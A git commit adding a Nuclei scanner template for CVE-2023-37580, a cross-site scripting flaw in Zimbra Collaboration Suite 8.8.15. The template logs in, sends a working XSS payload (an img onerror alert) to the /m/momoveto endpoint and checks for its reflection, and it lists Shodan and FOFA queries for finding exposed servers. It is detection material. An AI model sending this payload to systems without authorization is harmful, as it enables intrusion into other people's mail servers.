Merge pull request #7804 from projectdiscovery/CVE-2023-37580

Create CVE-2023-37580.yaml (Zimbra XSS)
2023-08-01 12:30:54 +05:30 · 2023-08-01 12:30:54 +05:30 · 70ea6d3bec
parent 0ea82dfb83 ddd0a02fbf
commit 70ea6d3bec
1 changed files with 51 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-37580.yaml
+++ b/http/cves/2023/CVE-2023-37580.yaml
@ -0,0 +1,51 @@
+id: CVE-2023-37580
+
+info:
+  name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
+  reference:
+    - https://github.com/Zimbra/zm-web-client/pull/827
+    - https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-37580
+  classification:
+    cve-id: CVE-2023-37580
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:475145467
+    fofa-query: icon_hash="475145467"
+  tags: cve,cve2023,zimbra,xss,authenticated
+
+http:
+  - raw:
+      - |
+        POST /zimbra/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        loginOp=login&username={{username}}&password={{password}}&client=mobile
+
+      - |
+        GET /m/momoveto?st="><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - '<img src=x onerror=alert(document.domain)>'
+          - 'id="zMoveForm"'
+        condition: and
+
+      - type: word
+        part: header_2
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200